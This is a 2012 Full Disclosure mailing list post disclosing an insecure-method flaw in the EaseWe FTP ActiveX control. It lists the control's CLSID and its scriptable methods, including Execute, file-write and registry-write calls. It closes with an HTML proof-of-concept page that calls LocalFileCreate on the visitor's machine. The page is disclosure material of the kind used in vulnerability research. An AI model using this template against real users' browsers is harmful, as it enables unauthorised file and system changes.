Full Disclosure mailing list archives

Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit

From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Wed, 8 Aug 2012 06:06:54 -0700
Exploit Title: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
Date: 2012-08-08
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.ftpocx.com/download.htm
Version: 4.6.02
Tested on: windows 7
Awesome Hesam BOF
==========================================================================
Class FtpLibrary
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
Number of Interfaces: 1
Default Interface: _FtpLibrary
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Interface _FtpLibrary : IDispatch
Default Interface: True
Members : 161
        QueueAppend
        QueueRemove
        FormatSize
        FormatFileSize
        FormatTime
        SFDFileName
        SFDFilter
        SFDInitialDir
        SFDTitle
        ShowBrowseFolderDialog
        ShowSaveFileDialog
        ServerName
        Username
        Password
        Port
        RemotePort
        RemotePath
        LocalPath
        ReplaceIndex
        ReplaceSetting
        RenameRule
        Percent
        MKDInfo
        MaxSpeed
        Rcvbuf
        Sndbuf
        Timeout
        RedoTimes
        AllowType
        DenyType
        MaxSize
        Title
        Encoding
        TranstatePath
        KeepAliveCommand
        KeepAliveInterval
        ListCommand
        ListSuffix
        LangInfo
        Info
        SInfo
        Lype
        ExistFile
        GetFileSize
        GetFtpFileSize
        GetFileInfo
        GetFtpFileInfo
        GetFileList
        GetFtpDirectoryInfo
        ExistDirectory
        CreateDirectory
        RemoveDirectory
        DeleteFile
        RenameFile
        SendCommand
        SetCurrentDirectory
        GetFileName
        GetFileNameWithoutExt
        GetFileExtension
        GetParentPath
        LocalFileExists
        LocalFolderExists
        LocalFileCreate
        LocalFolderCreate
        LocalFileDelete
        LocalFileRead
        LocalFileWrite
        GetLocalFileSize
        GetLocalFolderSize
        GetLocalFileCount
        GetLocalFileDate
        GetLocalFileList
        ShowCmd
        Execute
        Explore
        GetDriveNames
        ProxyHost
        ProxyPort
        RegCreate
        RegSetValue
        RegSetValueEx
        RegDelete
        RegDeleteValue
        RegDeleteValueEx
        RegGetValue
        RegGetValueEx
        RegExists
============================================================================
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click
here To Test"><br>
</body>
</HTML>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:

Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit kaveh ghaemmaghami (Aug 08)